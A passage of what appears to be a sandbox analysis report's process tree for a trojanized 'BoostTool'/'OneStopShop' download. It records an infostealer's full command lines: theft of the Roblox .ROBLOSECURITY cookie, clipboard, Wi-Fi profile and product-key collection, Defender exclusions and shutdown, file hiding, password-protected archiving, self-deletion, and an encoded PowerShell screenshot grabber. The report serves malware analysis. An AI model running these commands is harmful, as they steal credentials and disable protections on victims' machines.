QAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                    7⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:5832
                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pr3liv43\pr3liv43.cmdline"
                                                                      8⤵
                                                                        PID:5516
                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES47F.tmp" "c:\Users\Admin\AppData\Local\Temp\pr3liv43\CSC839D41524A3943879BFB6D11A9CBB2E9.TMP"
                                                                          9⤵
                                                                            PID:1972
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                      6⤵
                                                                        PID:6104
                                                                        • C:\Windows\system32\tree.com
                                                                          tree /A /F
                                                                          7⤵
                                                                            PID:5340
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                          6⤵
                                                                            PID:5300
                                                                            • C:\Windows\system32\tree.com
                                                                              tree /A /F
                                                                              7⤵
                                                                                PID:5492
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                              6⤵
                                                                                PID:5536
                                                                                • C:\Windows\system32\tree.com
                                                                                  tree /A /F
                                                                                  7⤵
                                                                                    PID:5152
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                  6⤵
                                                                                    PID:5732
                                                                                    • C:\Windows\system32\tree.com
                                                                                      tree /A /F
                                                                                      7⤵
                                                                                        PID:6012
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                      6⤵
                                                                                        PID:6024
                                                                                        • C:\Windows\system32\tree.com
                                                                                          tree /A /F
                                                                                          7⤵
                                                                                            PID:3908
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1572"
                                                                                          6⤵
                                                                                            PID:3756
                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                              taskkill /F /PID 1572
                                                                                              7⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5956
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                            6⤵
                                                                                              PID:5396
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1640
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                              6⤵
                                                                                                PID:2292
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                  7⤵
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2612
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                6⤵
                                                                                                  PID:5776
                                                                                                  • C:\Windows\system32\getmac.exe
                                                                                                    getmac
                                                                                                    7⤵
                                                                                                      PID:1880
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31962\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\smDOO.zip" *"
                                                                                                    6⤵
                                                                                                      PID:5264
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI31962\rar.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\_MEI31962\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\smDOO.zip" *
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2420
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                      6⤵
                                                                                                        PID:5860
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          7⤵
                                                                                                            PID:1972
                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                            wmic os get Caption
                                                                                                            7⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1260
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                          6⤵
                                                                                                            PID:3444
                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                              wmic computersystem get totalphysicalmemory
                                                                                                              7⤵
                                                                                                                PID:5728
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                              6⤵
                                                                                                                PID:5760
                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                  wmic csproduct get uuid
                                                                                                                  7⤵
                                                                                                                    PID:4812
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                  6⤵
                                                                                                                    PID:6024
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                      7⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:5976
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                    6⤵
                                                                                                                      PID:5596
                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                        wmic path win32_VideoController get name
                                                                                                                        7⤵
                                                                                                                        • Detects videocard installed
                                                                                                                        PID:5544
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                      6⤵
                                                                                                                        PID:2248
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                          7⤵
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:4924
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""
                                                                                                                        6⤵
                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                        PID:5400
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping localhost -n 3
                                                                                                                          7⤵
                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:3200
                                                                                                                • C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                  "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                  3⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Modifies registry class
                                                                                                                  PID:3500
                                                                                                                  • C:\Users\Admin\Downloads\OneStopShop\._cache_Synaptics.exe
                                                                                                                    "C:\Users\Admin\Downloads\OneStopShop\._cache_Synaptics.exe" InjUpdate
                                                                                                                    4⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4784
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5060
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:3852
                                                                                                            • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                                                                                                              "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                              1⤵
                                                                                                              • Checks processor information in registry
                                                                                                              • Enumerates system info in registry
                                                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:3156
                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              1⤵
                                                                                                                PID:5492
                                                                                                              • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\OneStopShop\Data\3 Month.txt
                                                                                                                1⤵
                                                                                                                  PID:640
                                                                                                                • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\OneStopShop\Data\Used.txt
                                                                                                                  1⤵
                                                                                                                  • Opens file in notepad (likely ransom note)
                                                                                                                  PID:4872
                                                                                                                • C:\Users\Admin\Downloads\OneStopShop\BoostTool.exe
                                                                                                                  "C:\Users\Admin\Downloads\OneStopShop\BoostTool.exe"
                                                                                                                  1⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Modifies registry class
                                                                                                                  PID:6100
                                                                                                                  • C:\Users\Admin\Downloads\OneStopShop\._cache_BoostTool.exe
                                                                                                                    "C:\Users\Admin\Downloads\OneStopShop\._cache_BoostTool.exe"
                                                                                                                    2⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5864
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5748
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                                                                                                                        4⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:5612
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'"
                                                                                                                          5⤵
                                                                                                                            PID:5836
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'
                                                                                                                              6⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:5884
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                            5⤵
                                                                                                                              PID:5904
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                6⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:3376
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""
                                                                                                                              5⤵
                                                                                                                              • Hide Artifacts: Hidden Files and Directories
                                                                                                                              PID:4664
                                                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                                                attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                                                                                                                                6⤵
                                                                                                                                • Views/modifies file attributes
                                                                                                                                PID:2416
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​  ‍ .scr'"
                                                                                                                              5⤵
                                                                                                                                PID:5600
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​  ‍ .scr'
                                                                                                                                  6⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:1488
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                5⤵
                                                                                                                                  PID:2804
                                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                                    tasklist /FO LIST
                                                                                                                                    6⤵
                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                    PID:4444
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                  5⤵
                                                                                                                                    PID:3808
                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                      tasklist /FO LIST
                                                                                                                                      6⤵
                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                      PID:6040
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                    5⤵
                                                                                                                                      PID:2664
                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                        6⤵
                                                                                                                                          PID:2368
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                        5⤵
                                                                                                                                        • Clipboard Data
                                                                                                                                        PID:4792
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell Get-Clipboard
                                                                                                                                          6⤵
                                                                                                                                          • Clipboard Data
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:1932
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                        5⤵
                                                                                                                                          PID:4992
                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                            tasklist /FO LIST
                                                                                                                                            6⤵
                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                            PID:5176
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                          5⤵
                                                                                                                                            PID:4576
                                                                                                                                            • C:\Windows\system32\tree.com
                                                                                                                                              tree /A /F
                                                                                                                                              6⤵
                                                                                                                                                PID:4508
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                              5⤵
                                                                                                                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                              PID:5400
                                                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                                                netsh wlan show profile
                                                                                                                                                6⤵
                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                PID:5468
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                              5⤵
                                                                                                                                                PID:4884
                                                                                                                                                • C:\Windows\system32\systeminfo.exe
                                                                                                                                                  systeminfo
                                                                                                                                                  6⤵
                                                                                                                                                  • Gathers system information
                                                                                                                                                  PID:1356
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                5⤵
                                                                                                                                                  PID:4988
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
